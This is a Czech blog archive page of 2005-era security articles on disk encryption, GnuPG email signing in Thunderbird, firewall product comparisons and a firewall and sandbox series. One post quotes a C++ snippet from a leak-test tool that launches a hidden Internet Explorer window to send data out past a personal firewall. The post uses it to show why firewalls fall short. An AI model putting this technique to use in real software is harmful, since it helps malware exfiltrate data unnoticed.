Bezpečnost » MyEgo.cz - Radek Hulán webzine

Naprostou většinu informací dnes máme uloženou v elektronické podobě na pevném disku. Ještě před pár lety by to byl spíše jeden šanon s papíry, nyní jsou to ale stovky až tisíce citlivých souborů. Ukrást a zneužít tyto informace je velice jednoduhé, stačí aby se někdo k Vašemu osobnímu počítači či notebooku dostal na pár minut, vytáhnul z něho disk, celý disk zkopíroval pomocí Acronis TrueImage či Norton Ghost na svůj notebook, a je hotovo. Zbytek v klidu dokončí v klimatizované kanceláři…

Proč šifrovat data na disku

Pokud nepoužíváte šifrování dat na disku, máte smůlu. Stejně jednoduše se k Vašim datům dostane kdokoliv, pokud počítač necháte zaheslovaný pod Windows XP, a naivně si myslíte, že neznalost hesla Administrátora postačí aby se do počítače nikdo nedostal. Není to pravda. Změna hesla Administrátora pod Windows je pro kohokoliv záležitost na 10 sekund, a poté si s Vaším počítačem dělá, co chce. Pokud máte notebook, a ztratíte jej, bez šifrování dat na disku si jeho obsah přečte kdokoliv i bez fyzické manipulace s diskem.

V tuto chvíli se začíná nabízet otázka, proč data na disku nekryptovat. Podobné věci se dají dělat s emailem, o šifrování komunikace na internetu pomocí GnuPG a o pohodlném propojení GnuPG s email klientem Thunderbird jsem psal již dříve, a není důvod proč podobně nešifrovat i Vaše lokální či mobilní (notebook, USB klíčenka) data.

Včera jsem začal zkoumat Software602 LAN Suite a Kerio Winroute Firewall 6, a rozhodl jsem se definitivně pro Kerio. Důvod je nakonec jednoduchý:

(odpověď na můj dotaz) Vážený pane Huláne, samozřejmě je nutné využívat LanSuitu jako SMTP/POP3 server. Jen tak může LanSuit uplatnit AntiSpam a Antivir.

Jinak řečeno, LAN SUITE neumí použít AntiSpam, Antivir a filtrování příloh na úrovni POP3/SMTP/IMAP protokolu, ale jen pro svůj interní mail server, což jsem nevěděl, a je to hodně polovičaté řešení, koncepce někdy z roku 1998, jenže my máme rok 2005.

Kerio Winroute tento zásadní problém nemá, její McAfee antivir je schopen pracovat na úrovni POP3/SMTP a FTP protokolu, a je to tedy to, co potřebuji.

Lépe se mi jeví i firewall/NAT část Kerio Winroute, oproti LAN SUITE má přece jenom Kerio bohatší a delší zkušenosti. Jen ještě zvažuji, zda místo integrovaného McAfee antiviru nejít do varianty Kerio + NOD32 plugin, je to mírně dražší, ale NOD32 bych viděl ještě jako o chloupek lepší řešení než McAfee (a rozhodně podstatně lepší než BitDefender v LAN SUITE). Kerio obsahuje rovněž integrovaný VPN server a VPN klienta, a její administrační část je řádově lepší.

V zásadě, rohodnutí je jasné, Kerio získávává 5 bodů z 5, LAN SUITE tak 3 z 5.

V předchozích článcích seriálu “Šifrování pro lamy” jsem popisoval jak si instalovat podporu pro GnuPG na Windows, a vygenerovat si privátní a veřejný klíč, a rovněž jak provést upgrade na nejnovější verzi GnuPG 1.4.0a. Tento článek se podívá na praktické použití GnuPG, a to šifrování a podepisování Vašich emailů ve vynikajícím open-source emailovém klientu Mozilla Thunderbird.

Je Thunderbird dobrý email klient?

Používal jsem různé emailové klienty, byl to M2 v Opeře, potom střídavě FoxMail a TheBat! 3.0, a na Linuxu pro změnu Evolution (v Gnome) a KMail (v KDE). Thunderbird jsem vyzkoušel někdy ve verzi 0.6 a bylo to neschopné, pomalé, a těžkopádné stvoření, tak jsem na něj zanevřel. Potom jsem si ale začal všímat, že stále více lidí mi posílá emaily z Thunderbirdu 1.0 (mám to zobrazené jako hlavičku, zajímá mě, kdo v čem pracuje), vyzkoušel jsem jej, a před týdnem se na něm usadil.

Thunderbird 1.0 je sice teoreticky pomalá aplikace, oproti M2 či TheBat! programovanému v C++/Delphi, nicméně, ono to ale stejně nepoznáte. Rozhraní / XUL se v posledních verzích stalo rychlejších a použitelným, stejně tak jako u Mozilla Firefoxu 1.0, a především, přibyly nové funkce.

Poznámka: mám k emailu poněkud zvláštní přístup, emailové zprávy nearchivuji, změna email klienta pro mě znamená jen export dosavadních kontaktů do CSV formátu a import do nového email klienta. Důležité zprávy (a především přílohy) si z emailů archivuji do dokumentů a tam se i zálohují.

Thunderbird 1.0 tedy umí:

• virtuální složky (jsou to uložená hledání),
• obsahuje standardní složky,
• umí přijímat více emailových účtů do jedněch lokálních složek, a aplikovat na ně společné filtry,
• má bayesiánský spam filter,
• má ve filtrech podporu pro známé a neznámé kontakty,
• funguje na Windows i Linuxu, mám tak poštu umístěnou na FAT32 partitions, a stejné emaily a kontakty mám pod oběma systémy,
• podporuje extensions (zatím jich ale moc neexistuje, vlastně jen 3 použitelné) a themes.

A nutno říci, že bych se o Thunderbird nezajímal, kdyby pro něj neexistovala vynikající extension Enigmail pro práci s GnuPG (existuje i v české verzi). Enigmail je nadstavba nad GnuPG, která pokrývá veškeré moje potřeby, a je lepší než integrovaná podpora pro GnuPG v TheBat! 3.0, Evolution 2.2 či KMail z KDE 3.3.x.

Pokud budete extensions pro Thunderbird stahovat ve Firefoxu, udělejte to přes "Save As", uložte extension na disk, a potom je přetáhněte na Správce rozšíření ve Thunderbirdu, instalují se automaticky, při kliknutí v browseru by se instalovaly do Firefoxu, což nechcete.

Druhou (a s QuoteCollapse poslední) zajímavou extensions pro Thunderbird je Contacts Sidebar, který doplní kontakty do Thunderbirdu tak, jak jsem zvyklý z TheBat! a KMail.

A celé by to nebylo úplné bez Nautical Theme, decentního tématu pro Thunderbird s Gnome ikonami. Pokud používáte Firefox, Gnome-like téma nazvané Gnome-Fx-blue je pro něj dostupné taky, a vypadá skvěle.

V předchozím článku jsem popisoval instalaci GnuPG, její optimalizované nullify.org varianty. Tato varianta Vám instaluje GnuPG verze 1.2.3, nicméně, dostupná je již verze 1.4.0a. Verzi 1.4.0a si můžete stáhnout z GnuPG.org, nicméně, program TheBat! Vám s ní nebude fungovat, bude vypisovat tuto hlášku:

gpg: conversion from `utf-8' to `CP0' not available

A pokud vyzkoušíte spustit WinPT 0.7.96, tak pro změnu zahlásí, že máte chybnou verzi GnuPG.

Instalace poslední verze GnuPG (1.4.0a) a WinPT 0.9.14:

• stáhněte si soubor gnupg-w32cli-1.4.0a.zip a rozbalte jej do adresáře C:\GnuPG\.
• stáhněte si soubor gnupg-w32cli-1.4.0a-cpfix.zip a rozbalte jej do adresáře C:\GnuPG\, stávající obsah přepište.
• stáhněte si soubor winpt-0.9.14-exe.zip a rozbalte jej do adresáře C:\GnuPG\.

Po této operaci budete mít plně funkční GnuPG verze 1.4.0a (i pro TheBat!) a WinPT poslední verze 0.9.14.

Tento třídílný seriál o šifrování (především emailové korespondence) na Windows nebude mít za cíl objasňovat žádnou teorii, o té toho již bylo napsáno dost třeba na novinky.cz (patnácti-dílný seriál), a něco málo napsal i Arthur Dent (úvodní článek).

Zprovoznit šifrování emailů pomocí standardu OpenPGP je na Linuxu mimořádně snadné, protože komponenty jako gpg, gpa či kgpg se instalují standardně v každé distribuci, a email klienti jako je KMail pro KDE či Evolution pro Gnome mají pro gpg standardně postavený GUI interface. Nicméně, na Windows je situace poněkud složitější, zvláště pro lidi, co neumí a nechtějí používat příkazovou řádku, ovšem i zde existují klikací balíčky pro řádkové gpg typu WinPT (správa klíčů), Enigmail (doplněk pro Thunderbird), či podpora pro gpg v programu TheBat!

První díl této série se bude zabývat instalaci GnuPG, což je open-source implementace OpenPGP standardu (plus je známá komerční implementace PGP).

OpenPGP je nejpoužívanější standard pro šifrování emailů na světě.

A proč vlastně šifrovat a podepisovat svoje zprávy?

Poslat email jako radek.hulan@gmail.com může naprosto každý, (Open)PGP podpis ovšem zaručí, že identifikace skutečného odesilatele není zkompromitována. Šifrování zprávy navíc znemožní, technicky, komukoliv neoprávněnému tuto zprávu číst, ať už to je Vaše konkurence, ISP, či další uživatelé internetu. Šifrovat prostě můžete, takže otázka nezní, proč ano, ale proč ne?

Narazil jsem dnes na takový pěkný malý prográmek, má 3 KB z webu tooleaky.zensoft.com, který krásně ukazuje, proč je Vaše firewall zcela k ničemu. Již dávno jsem psal o tom, že nejen antivirus je k ničemu, ale, že k ničemu je i samotná firewall, pokud není provázána se SandBoxem.

Zkuste si ten prográmek schválně stáhnout a spustit. Stažení i spuštění zabere 10 sekund. Pokud se Vám ukáže “success”, máte problém. Ten prográmek totiž využívá léta známé chyby řady Windows firewallů, a totiž, autorizace přístupu MSIE na internet (nutné třeba pro online Windows Update), a následné zneužití MSIE jinými programy. Stačí na to pár řádků kódu v C++:

bool TransmitAndReceiveData ( ) {
 // Step 1: Find the MSIE
 char buffer[MAX_PATH + 512];
 long len = sizeof(buffer);
 RegQueryValueA(
 HKEY_LOCAL_MACHINE,
 "SOFTWARE\\Classes\\Applications"+
 "\\iexplore.exe\\shell\\open\\command",
 buffer,
 &len);
 // Step 2: spawn IE in a hidden window
 for ( char*c = &buffer[1]; *c != 0; c++ )
   if ( *c == '%' ) *c = 0;
 z_strcat(buffer, baseURL);
 z_strcat(buffer, outputString);
 WinExec(buffer, SW_HIDE);
 // Step 3: wait for the page to load
 int startCount = GetTickCount();
 do {
   EnumWindows(EnumWindowsProc, 0);
   if ( (GetTickCount() - startCount) > 30000 )
     return false;
 } while ( ieWnd == NULL );
 // Step 4: close the window
 SendMessage(ieWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
 return true;
}

Takto jednoduše může libovolný virus zavolat MSIE, které je autorizováno přistupovat k internetu, a potom libovolně zasílat, co se mu zlíbí. Pěkné, ne? Pokud jste aspoň jednou navštívili s MSIE nějakou warez či porno stránku, spustili si P2P klienta, nebo nějaký “keygen”, jen tak stažený z webu, je docela dost dobře možné, že na počítači máte škůdce. A to škůdce, kterého Vaše firewall nikdy neodhalí, a nezachytí jej ani antivirus či spyware (ty se skutečně nesoustředí na nákazy získané z warez a porno odkazů)…

Microsoftí firewall toto vůbec neumí, Tiny Personal Firewall, mnou preferovaná, to umí, ZoneAlarm Pro to sice umí, ale má to defaultně vypnuté i ve verzi 5.1.

V dnešním, třetím, díle seriálu o bezpečnosti začnu poněkud netradičně. A to od konce. Nasměrujte svůj browser na grc.com. Další testy jsou dostupné na pcflank.com a scan.sygatetech.com. Pokud se Vám zobrazí něco jiného než následující tabulka, Vaše firewall má problém! A i pokud jej mít nebude, čtěte rovněž dál, protože firewall je jen malá část nutné bezpečnosti osobního počítače s Windows! Nepodléhejte falešnému pocitu bezpečí, potřebujete i sandbox!

GRC Port Authority Report
Results from scan of ports: 
 0, 21-23, 25, 79, 80, 110,
 113, 119, 135, 139, 143, 389, 443, 445, 
 1002, 1024-1030, 1720, 5000 
0 Ports Open 
0 Ports Closed 
26 Ports Stealth 
--------------------- 
26 Ports Tested 
ALL PORTS tested were found to be: STEALTH. 
TruStealth: PASSED - ALL tested ports were STEALTH, 
- NO unsolicited packets were received, 
  NO Ping reply (ICMP Echo) was received. 

Obsah:

• Díl 1: firewall a sandbox versus antivirus. Doporučený setup.
• Díl 2: řešení bezpečnosti pro Windows.
• Díl 3: praktické příklady nastavení firewallu.

Tato část seriálu by se chtěla zaměřit na konkrétní příklady použití Tiny Personal Firewall 5.5, což je, vzhledem ke své ceně, jednoznačně nejlepší řešení pro dokonalé zabezpečení počítače s Windows.

V předchozím díle článku Firewall je základ, antivir je k ničemu!, jsem se věnoval především tomu, k čemu slouží sandbox a firewall, a proč je použití antiviru spíše dodáním falešného pocitu bezpečí, než skutečným řešením.

Obsah:

• Díl 1: firewall a sandbox versus antivirus. Doporučený setup.
• Díl 2: řešení bezpečnosti pro Windows.
• Díl 3: praktické příklady nastavení firewallu.

Cíl tohoto článku: vysvětlit pokročilé principy nastavení a fungování firewallu a sandboxu.

Teď trochu více teorie, mírně zaměřené na Tiny Personal Firewall (existují i jiná řešení, nicméně TPF je mocné, a to jako firewall + sandbox, jiná řešení obvykle kombinují 2 i více softwarových balíků, které se hůř ovládají a vyjdou Vás i dráž).

Nicméně, teorie bezpečnosti je pochopitelně platná i pro jiné kombinace, než TPF.

Firewall slouží jako "filtr", který určuje, jaké procesy mohou komunikovat s okolním světem, a na kterým portech se, případně, počítač okolnímu světu otevře a bude naslouchat.

Komunikace se v zásadě dělí na:

• Outbound - výstupní, někdy v nastavení firewallu označovaná jako Local, Trusted Zone, či Allow Access.
• Inbound - vstupní, někdy označovaná také jako Server, či Internet.

V následujícím seriálu bych se chtěl věnovat bezpečnosti počítače připojeného k internetu, a to pro středně pokročilé uživatele. Seriál je rozdělen do 3 dílů.

Obsah:

• Díl 1: firewall a sandbox versus antivirus. Doporučený setup.
• Díl 2: řešení bezpečnosti pro Windows.
• Díl 3: praktické příklady nastavení firewallu.

Máte na svém počítači antivirus? Spoléháte se jen na něj, popřípadě ještě na triviální firewall ve Windows XP? No, potom je dost pravděpodobné, že to nejste jen Vy, kdo počítač “kontroluje”…

Antivirus je v dnešní době k ničemu. Pokud je Váš počítač připojen k internetu jen přes dial-up, či přes GPRS (zde je výhodou předřazená firewall providera), tak Vás antivirus nemá šanci ochránit. Při připojení pevnou linku, ADSL, WiFi je to ještě horší…

Antivirus je primitivní software, který hledá známé virové sekvence v operační paměti počítače, boot sektoru disku, a v souborech. Některé antiviry implementují navíc pop3 a smtp proxy, a hledají viry i v emailech a přílohách. Nicméně, přestože existuje heuristická analýza, tak antiviry na nové viry a zejména trojany a mallware nemají šanci.

Základem bezpečnosti je prevence. Léčit, antivirem, “nemocný” počítač je často marné, někdy je konečným řešením jen low-level formát disku a čistá instalace. Podobně jako je rozumnější prevence u lidí, tedy žít zdravě a jíst vitamíny, než… polykat velké dávky antibiotik, platí to i u bezpečnosti počítačů.